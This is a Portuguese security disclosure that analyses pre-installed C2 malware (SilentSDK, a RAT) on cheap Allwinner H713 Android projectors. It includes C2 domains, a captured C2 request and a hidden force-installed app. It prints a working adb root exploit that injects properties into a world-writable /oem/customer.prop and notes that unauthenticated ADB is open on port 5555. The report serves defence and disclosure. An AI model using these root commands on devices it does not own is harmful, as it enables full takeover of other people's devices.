
Análise de uma rede c2 de beamers chineses - SilentSDK-Analysis
Relatório de Análise Técnica — Pesquisa de Segurança
Dispositivos Afetados: Múltiplos projetores Android de marcas como Nonete (ex.: Modelo HY260Pro) (provavelmente também vários projetores da Magcubic, Hotack, Huyukang e muitos outros, pois essas empresas distribuem modelos semelhantes e há indícios que apoiam isso)
Plataforma do Chipset: Allwinner H713 / sun50iw12p1 — potencialmente afeta todos os dispositivos nesta plataforma
Período de Análise: 11 a 17 de abril de 2026
Classificação: Infraestrutura de Comando e Controle pré-instalada com payload de Trojan de Acesso Remoto
api.pixelpioneerss.com), extrai IDs sensíveis do dispositivo e pode baixar e executar código malicioso adicional arbitrário com privilégios de root a qualquer momento (chmod 777). Além disso, os dispositivos possuem backdoors de root abertos.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) devem ser bloqueados no nível de rede. Os usuários afetados só podem desabilitar os aplicativos maliciosos manualmente via ADB, pois estão profundamente embutidos no sistema.A infraestrutura de malware documentada neste relatório está pré-instalada em projetores Android atualmente sendo vendidos em grandes quantidades para consumidores finais na Amazon, eBay e AliExpress. Os dispositivos afetados abrangem possivelmente múltiplas marcas (Hotack, Huyukang, Magcubic, Nonete, entre outras). Infraestrutura C2 idêntica foi confirmada independentemente em outros dispositivos do mesmo fabricante (veja Seção 13). O padrão corresponde aos casos BADBOX.
Dispositivo Adquirido: Amazon Link - Nonete Mini Beamer 4K 1080P
| Propriedade | Valor |
|---|---|
| Nome da Marca | Nonete HY260Pro (modelo vendido por várias empresas) |
| Nome do Modelo Interno | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32 bits) |
| Sistema Operacional | SpectraOS (Android 11, Kernel 5.4.99) |
| Real Build Fingerprint | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Spoofed Build Fingerprint | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissivo (sem aplicação) |
| Chave de Assinatura da Plataforma | Chave de Teste AOSP Pública |
| Certificado OEM | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Canal de Firmware | HY260Pro_SpectraOS_TPYB |
Nota sobre o escopo: O chipset Allwinner H713 está integrado em numerosos projetores Android baratos vendidos sob nomes de marcas variáveis no mercado europeu. A base de firmware idêntica (h713_tuna_p3) e o operador C2 idêntico (Shenzhen Aodin Technology) sugerem fortemente que todos os dispositivos deste OEM contêm a mesma infraestrutura.
| Etapa | Ação | Resultado |
|---|---|---|
| 1 | Captura de tráfego de rede com Wireshark | Tráfego HTTP para store-api.aodintech.com |
| 2 | Decodificação da resposta C2 compactada com gzip | 7 apps, incluindo "SilentTools" oculto |
| 3 | Descriptografia AES-CBC do caminho de download | Chave [REDACTED], URL para arquivo .bpp |
| 4 | Exploração de root via /oem/customer.prop | uid=0(root) após injeção de propriedade |
| 5 | Extração forense de /data, /oem, /system | APKs, bancos de dados, configurações |
| 6 | Análise estática do DEX do StoreOS | pm install -r -d, proteção de inversão de bytes |
| 7 | Engenharia reversa do mecanismo reverseLen | Compreensão da proteção antianálise |
| 8 | Quebra da proteção de inversão de bytes | DEX do SilentSDK descriptografado e analisável |
| 9 | Descriptografia XOR das strings do SilentSDK | Domínio C2 api.pixelpioneerss.com confirmado |
| 10 | Verificação de hash em três fontes | MD5/SHA-256 correspondem perfeitamente |
| 11 | Engenharia reversa do processo de download do malware | Servidores ainda online |
| 12 | Engenharia reversa do malware | Framework RAT baseado em plugins |
O acesso root foi alcançado através de uma combinação de três vulnerabilidades:
/oem gravável mundialmente — A partição é montada como FAT com fmask=0000.customer.prop carregado na inicialização — Sobrescreve propriedades do sistema.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**Impacto:** Qualquer utilizador com acesso físico ou um atacante na mesma rede (via ADB, porta 5555 aberta, sem autenticação) obtém acesso root completo.
---
## 4. Resposta do Servidor C2 — Evidência Principal
### Requisição HTTP Capturada```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
A resposta compactada com gzip contém uma lista JSON com sete aplicativos. Seis deles são aplicativos de streaming comuns (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). O sétimo é SilentTools:
| App | Package | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |